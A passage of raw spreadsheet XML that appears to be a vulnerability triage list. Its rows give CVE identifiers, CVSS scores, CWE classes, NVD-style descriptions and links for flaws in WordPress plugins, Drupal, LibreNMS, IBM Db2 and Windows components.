t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2206" s="5" t="inlineStr" /><c r="H2206" s="5" t="n"><v>0.001</v></c><c r="I2206" s="5" t="inlineStr" /><c r="J2206" s="5" t="inlineStr" /><c r="K2206" s="5" t="inlineStr"><is><t>entity_browser_project:entity_browser</t></is></c><c r="L2206" s="5" t="inlineStr" /><c r="M2206" s="5" t="inlineStr" /><c r="N2206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2206" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P2206" s="5" t="inlineStr" /><c r="Q2206" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2206" s="5" t="inlineStr"><is><t>Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Entity Browser allows Stored XSS. This issue affects Entity Browser versions: from 0.0.0 to 2.16.0.</t></is></c><c r="S2206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18986</t></is></c></row><row r="2207"><c r="A2207" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2207" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2207" s="5" t="inlineStr"><is><t>CVE-2026-19862</t></is></c><c r="D2207" s="5" t="n"><v>4.8</v></c><c r="E2207" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2207" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2207" s="5" t="inlineStr" /><c r="H2207" s="5" t="n"><v>0.002</v></c><c r="I2207" s="5" t="inlineStr" /><c r="J2207" s="5" t="inlineStr" /><c r="K2207" s="5" t="inlineStr" /><c r="L2207" s="5" t="inlineStr" /><c r="M2207" s="5" t="inlineStr" /><c r="N2207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2207" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2207" s="5" t="inlineStr" /><c r="Q2207" s="5" t="inlineStr"><is><t>CWE-93</t></is></c><c r="R2207" s="5" t="inlineStr"><is><t>The JetFormBuilder WordPress plugin before 3.6.5.2 does not validate or strip line breaks from address values it sources from submitted form fields before adding them to the headers of the e-mails it sends, allowing unauthenticated users to inject arbitrary e-mail headers, add hidden recipients and spoof the sender. Exploitation requires the site to be configured to take one of the message's addresses from a form field.</t></is></c><c r="S2207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19862</t></is></c></row><row r="2208"><c r="A2208" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2208" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2208" s="5" t="inlineStr"><is><t>CVE-2026-69474</t></is></c><c r="D2208" s="5" t="n"><v>4.8</v></c><c r="E2208" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2208" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2208" s="5" t="inlineStr" /><c r="H2208" s="5" t="n"><v>0.007</v></c><c r="I2208" s="5" t="inlineStr" /><c r="J2208" s="5" t="inlineStr" /><c r="K2208" s="5" t="inlineStr" /><c r="L2208" s="5" t="inlineStr" /><c r="M2208" s="5" t="inlineStr" /><c r="N2208" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2208" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2208" s="5" t="inlineStr" /><c r="Q2208" s="5" t="inlineStr"><is><t>CWE-126, CWE-416</t></is></c><c r="R2208" s="5" t="inlineStr"><is><t>Use after free in Windows Overlay Filter allows an authorized attacker to disclose information over a network.</t></is></c><c r="S2208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69474</t></is></c></row><row r="2209"><c r="A2209" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2209" s="5" t="inlineStr"><is><t>CVE-2026-69615</t></is></c><c r="D2209" s="5" t="n"><v>4.8</v></c><c r="E2209" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2209" s="5" t="inlineStr" /><c r="H2209" s="5" t="n"><v>0.004</v></c><c r="I2209" s="5" t="inlineStr" /><c r="J2209" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K2209" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L2209" s="5" t="inlineStr" /><c r="M2209" s="5" t="inlineStr" /><c r="N2209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2209" s="5" t="inlineStr" /><c r="Q2209" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2209" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.</t></is></c><c r="S2209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69615</t></is></c></row><row r="2210"><c r="A2210" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2210" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2210" s="5" t="inlineStr"><is><t>CVE-2026-78560</t></is></c><c r="D2210" s="5" t="n"><v>4.8</v></c><c r="E2210" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2210" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G2210" s="5" t="inlineStr" /><c r="H2210" s="5" t="n"><v>0.002</v></c><c r="I2210" s="5" t="inlineStr" /><c r="J2210" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K2210" s="5" t="inlineStr" /><c r="L2210" s="5" t="inlineStr" /><c r="M2210" s="5" t="inlineStr" /><c r="N2210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2210" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2210" s="5" t="inlineStr" /><c r="Q2210" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R2210" s="5" t="inlineStr"><is><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is></c><c r="S2210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t></is></c></row><row r="2211"><c r="A2211" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2211" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2211" s="5" t="inlineStr"><is><t>CVE-2026-80437</t></is></c><c r="D2211" s="5" t="n"><v>4.8</v></c><c r="E2211" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2211" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2211" s="5" t="inlineStr" /><c r="H2211" s="5" t="n"><v>0.002</v></c><c r="I2211" s="5" t="inlineStr" /><c r="J2211" s="5" t="inlineStr" /><c r="K2211" s="5" t="inlineStr" /><c r="L2211" s="5" t="inlineStr" /><c r="M2211" s="5" t="inlineStr" /><c r="N2211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2211" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2211" s="5" t="inlineStr" /><c r="Q2211" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="R2211" s="5" t="inlineStr"><is><t>The Ninja Forms WordPress plugin from 3.14.10 before 3.15.2 does not prevent shortcodes in request-derived values from being executed when it substitutes them into content it later processes for shortcodes, allowing unauthenticated users to run any shortcode registered on the site.</t></is></c><c r="S2211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80437</t></is></c></row><row r="2212"><c r="A2212" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2212" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2212" s="5" t="inlineStr"><is><t>CVE-2026-80439</t></is></c><c r="D2212" s="5" t="n"><v>4.8</v></c><c r="E2212" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2212" s="5" t="inlineStr"><is><t>contact@wpscan.com</t></is></c><c r="G2212" s="5" t="inlineStr" /><c r="H2212" s="5" t="n"><v>0.002</v></c><c r="I2212" s="5" t="inlineStr" /><c r="J2212" s="5" t="inlineStr" /><c r="K2212" s="5" t="inlineStr" /><c r="L2212" s="5" t="inlineStr" /><c r="M2212" s="5" t="inlineStr" /><c r="N2212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2212" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2212" s="5" t="inlineStr" /><c r="Q2212" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="R2212" s="5" t="inlineStr"><is><t>The Redirection for Contact Form 7 WordPress plugin from 2.2.7 before 3.2.11 does not prevent shortcodes in submitted form values from being executed when it substitutes those values into an action's settings and then processes those settings for shortcodes, allowing unauthenticated users to run any shortcode registered on the site and read its output.</t></is></c><c r="S2212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80439</t></is></c></row><row r="2213"><c r="A2213" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2213" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2213" s="5" t="inlineStr"><is><t>CVE-2026-84188</t></is></c><c r="D2213" s="5" t="n"><v>4.8</v></c><c r="E2213" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2213" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2213" s="5" t="inlineStr" /><c r="H2213" s="5" t="n"><v>0.002</v></c><c r="I2213" s="5" t="inlineStr" /><c r="J2213" s="5" t="inlineStr" /><c r="K2213" s="5" t="inlineStr" /><c r="L2213" s="5" t="inlineStr" /><c r="M2213" s="5" t="inlineStr" /><c r="N2213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2213" s="5" t="inlineStr"><is><t>2026-09-01</t></is></c><c r="P2213" s="5" t="inlineStr" /><c r="Q2213" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2213" s="5" t="inlineStr"><is><t>LibreNMS versions &lt;= 26.4.0 contain a stored cross-site scripting vulnerability in the graph_descr.&lt;graphtype&gt; configuration settings, which are echoed verbatim without HTML escaping in includes/html/pages/graphs.inc.php. An administrator can store a malicious HTML payload that executes in the browser of any authenticated user who views the affected graph type. The issue is fixed in version 26.7.0.</t></is></c><c r="S2213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84188</t></is></c></row><row r="2214"><c r="A2214" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2214" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2214" s="5" t="inlineStr"><is><t>CVE-2026-85541</t></is></c><c r="D2214" s="5" t="n"><v>4.8</v></c><c r="E2214" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2214" s="5" t="inlineStr"><is><t>twcert@cert.org.tw</t></is></c><c r="G2214" s="5" t="inlineStr" /><c r="H2214" s="5" t="n"><v>0.003</v></c><c r="I2214" s="5" t="inlineStr" /><c r="J2214" s="5" t="inlineStr" /><c r="K2214" s="5" t="inlineStr" /><c r="L2214" s="5" t="inlineStr" /><c r="M2214" s="5" t="inlineStr" /><c r="N2214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2214" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2214" s="5" t="inlineStr" /><c r="Q2214" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2214" s="5" t="inlineStr"><is><t>DreamMaker developed by Interinfo has a Reflected Cross-site Scripting vulnerability. Authenticated remote attackers can execute arbitrary JavaScript codes in user's browser via a malicious website.</t></is></c><c r="S2214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85541</t></is></c></row><row r="2215"><c r="A2215" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2215" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2215" s="5" t="inlineStr"><is><t>CVE-2026-86257</t></is></c><c r="D2215" s="5" t="n"><v>4.8</v></c><c r="E2215" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2215" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G2215" s="5" t="inlineStr" /><c r="H2215" s="5" t="n"><v>0.002</v></c><c r="I2215" s="5" t="inlineStr" /><c r="J2215" s="5" t="inlineStr" /><c r="K2215" s="5" t="inlineStr" /><c r="L2215" s="5" t="inlineStr" /><c r="M2215" s="5" t="inlineStr" /><c r="N2215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2215" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P2215" s="5" t="inlineStr" /><c r="Q2215" s="5" t="inlineStr"><is><t>CWE-1236</t></is></c><c r="R2215" s="5" t="inlineStr"><is><t>wger before 2.6 fails to sanitize first_name and last_name fields in the gym member TSV export endpoint, allowing any gym member to inject spreadsheet formulas. Attackers can inject formulas like =HYPERLINK to exfiltrate admin data or execute code when admins open the exported file in Excel or LibreOffice Calc.</t></is></c><c r="S2215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86257</t></is></c></row><row r="2216"><c r="A2216" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2216" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2216" s="5" t="inlineStr"><is><t>CVE-2026-18567</t></is></c><c r="D2216" s="5" t="n"><v>4.7</v></c><c r="E2216" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2216" s="5" t="inlineStr" /><c r="H2216" s="5" t="n"><v>0.001</v></c><c r="I2216" s="5" t="inlineStr" /><c r="J2216" s="5" t="inlineStr"><is><t>ibm:db2</t></is></c><c r="K2216" s="5" t="inlineStr"><is><t>ibm:db2_mirror_for_i</t></is></c><c r="L2216" s="5" t="inlineStr" /><c r="M2216" s="5" t="inlineStr" /><c r="N2216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2216" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P2216" s="5" t="inlineStr" /><c r="Q2216" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R2216" s="5" t="inlineStr"><is><t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a local attacker to obtain information due to a race condition involving a predictable Unix domain socket path in a world-writable directory.</t></is></c><c r="S2216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-18567</t></is></c></row><row r="2217"><c r="A2217" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2217" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C2217" s="5" t="inlineStr"><is><t>CVE-2026-19861</t></is></c><c r="D2217" s="5" t="n"><v>4.7</v></c><c r="E2217" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2217" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G2217" s="5" t="inlineStr" /><c r="H2217" s="5" t="n"><v>0.002</v></c><c r="I2217" s="5" t="inlineStr" /><c r="J2217" s="5" t="inlineStr" /><c r="K2217" s="5" t="inlineStr" /><c r="L2217" s="5" t="inlineStr" /><c r="M2217" s="5" t="inlineStr" /><c r="N2217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2217" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P2217" s="5" t="inlineStr" /><c r="Q2217" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R2217" s="5" t="inlineStr"><is><t>The JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 does not properly sanitise and escape a form field's value before including it in the HTML notification emails it sends, allowing unauthenticated users to inject arbitrary HTML into messages delivered to administrators and other recipients. Whether injected script executes depends on the recipient's mail client, but the injected markup is rendered regardless.</t></is></c><c r="S2217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19861</t></is></c></row><row r="2218"><c r="A2218" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2218" s="5" t="inlineStr"><is><t>CVE-2026-68849</t></is></c><c r="D2218" s="5" t="n"><v>4.7</v></c><c r="E2218" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2218" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2218" s="5" t="inlineStr" /><c r="H2218" s="5" t="n"><v>0.002</v></c><c r="I2218" s="5" t="inlineStr" /><c r="J2218" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2218" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L2218" s="5" t="inlineStr" /><c r="M2218" s="5" t="inlineStr" /><c r="N2218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2218" s="5" t="inlineStr" /><c r="Q2218" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2218" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t></is></c><c r="S2218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t></is></c></row><row r="2219"><c r="A2219" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2219" s="5" t="inlineStr"><is><t>CVE-2026-68891</t></is></c><c r="D2219" s="5" t="n"><v>4.7</v></c><c r="E2219" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2219" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2219" s="5" t="inlineStr" /><c r="H2219" s="5" t="n"><v>0.002</v></c><c r="I2219" s="5" t="inlineStr" /><c r="J2219" s="5" t="inlineStr" /><c r="K2219" s="5" t="inlineStr" /><c r="L2219" s="5" t="inlineStr" /><c r="M2219" s="5" t="inlineStr" /><c r="N2219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2219" s="5" t="inlineStr" /><c r="Q2219" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2219" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="S2219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t></is></c></row><row r="2220"><c r="A2220" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2220" s="5" t="inlineStr"><is><t>CVE-2026-69316</t></is></c><c r="D2220" s="5" t="n"><v>4.7</v></c><c r="E2220" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2220" s="5" t="inlineStr" /><c r="H2220" s="5" t="n"><v>0.003</v></c><c r="I2220" s="5" t="inlineStr" /><c r="J2220" s="5" t="inlineStr" /><c r="K2220" s="5" t="inlineStr" /><c r="L2220" s="5" t="inlineStr" /><c r="M2220" s="5" t="inlineStr" /><c r="N2220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2220" s="5" t="inlineStr" /><c r="Q2220" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R2220" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="S2220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t></is></c></row><row r="2221"><c r="A2221" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2221" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2221" s="5" t="inlineStr"><is><t>CVE-2026-69425</t></is></c><c r="D2221" s="5" t="n"><v>4.7</v></c><c r="E2221" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2221" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2221" s="5" t="inlineStr" /><c r="H2221" s="5" t="n"><v>0.003</v></c><c r="I2221" s="5" t="inlineStr" /><c r="J2221" s="5" t="inlineStr" /><c r="K2221" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L2221" s="5" t="inlineStr" /><c r="M2221" s="5" t="inlineStr" /><c r="N2221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2221" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2221" s="5" t="inlineStr" /><c r="Q2221" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R2221" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t></is></c><c r="S2221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t></is></c></row><row r="2222"><c r="A2222" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2222" s="5" t="inlineStr"><is><t>CVE-2026-69483</t></is></c><c r="D2222" s="5" t="n"><v>4.7</v></c><c r="E2222" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2222" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2222" s="5" t="inlineStr" /><c r="H2222" s="5" t="n"><v>0.003</v></c><c r="I2222" s="5" t="inlineStr" /><c r="J2222" s="5" t="inlineStr" /><c r="K2222" s="5" t="inlineStr" /><c r="L2222" s="5" t="inlineStr" /><c r="M2222" s="5" t="inlineStr" /><c r="N2222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2222" s="5" t="inlineStr" /><c r="Q2222" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2222" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t></is></c><c r="S2222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t></is></c></row><row r="2223"><c r="A2223" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2223" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2223" s="5" t="inlineStr"><is><t>CVE-2026-69771</t></is></c><c r="D2223" s="5" t="n"><v>4.7</v></c><c r="E2223" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2223" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2223" s="5" t="inlineStr" /><c r="H2223" s="5" t="n"><v>0.003</v></c><c r="I2223" s="5" t="inlineStr" /><c r="J2223" s="5" t="inlineStr" /><c r="K2223" s="5" t="inlineStr" /><c r="L2223" s="5" t="inlineStr" /><c r="M2223" s="5" t="inlineStr" /><c r="N2223" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2223" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2223" s="5" t="inlineStr" /><c r="Q2223" s="5" t="inlineStr"><is><t>CWE-59</t></is></c><c r="R2223" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="S2223" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t></is></c></row><row r="2224"><c r="A2224" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2224" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2224" s="5" t="inlineStr"><is><t>CVE-2026-69792</t></is></c><c r="D2224" s="5" t="n"><v>4.7</v></c><c r="E2224" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2224" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2224" s="5" t="inlineStr" /><c r="H2224" s="5" t="n"><v>0.002</v></c><c r="I2224" s="5" t="inlineStr" /><c r="J2224" s="5" t="inlineStr" /><c r="K2224" s="5" t="inlineStr" /><c r="L2224" s="5" t="inlineStr" /><c r="M2224" s="5" t="inlineStr" /><c r="N2224" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2224" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2224" s="5" t="inlineStr" /><c r="Q2224" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R2224" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t></is></c><c r="S2224" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t></is></c></row><row r="2225"><c r="A2225" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2225" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2225" s="5" t="inlineStr"><is><t>CVE-2026-69832</t></is></c><c r="D2225" s="5" t="n"><v>4.7</v></c><c r="E2225" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G2225" s="5" t="inlineStr" /><c r="H2225" s="5" t="n"><v>0.004</v></c><c r="I2225" s="5" t="inlineStr" /><c r="J2225" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K222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25" s="5" t="inlineStr" /><c r="M2225" s="5" t="inlineStr" /><c r="N2225" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2225" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2225" s="5" t="inlineStr" /><c r="Q2225" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R2225" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="S2225" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t></is></c></row><row r="2226"><c r="A2226" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2226" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2226" s="5" t="inlineStr"><is><t>CVE-2026-69853</t></is></c><c r="D2226" s="5" t="n"><v>4.7</v></c><c r="E2226" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2226" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2226" s="5" t="inlineStr" /><c r="H2226" s="5" t="n"><v>0.003</v></c><c r="I2226" s="5" t="inlineStr" /><c r="J2226" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2226"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26" s="5" t="inlineStr" /><c r="M2226" s="5" t="inlineStr" /><c r="N2226" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2226" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2226" s="5" t="inlineStr" /><c r="Q2226" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="R2226" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t></is></c><c r="S2226" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t></is></c></row><row r="2227"><c r="A2227" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2227" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2227" s="5" t="inlineStr"><is><t>CVE-2026-69895</t></is></c><c r="D2227" s="5" t="n"><v>4.7</v></c><c r="E2227" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2227" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G2227" s="5" t="inlineStr" /><c r="H2227" s="5" t="n"><v>0.003</v></c><c r="I2227" s="5" t="inlineStr" /><c r="J2227" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2227"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27" s="5" t="inlineStr" /><c r="M2227" s="5" t="inlineStr" /><c r="N2227" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O2227" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P2227" s="5" t="inlineStr" /><c r="Q2227" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R2227" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t></is></c><c r="S2227" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t></is></c></row><row r="2228"><c r="A2228" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B2228" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C2228" s="5" t="inlineStr"><is><t>CVE-2026-72931</t></is></c><c r="D2228" s="5" t="n"><v>4.7</v></c><c r="E2228" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F2228" s="5" 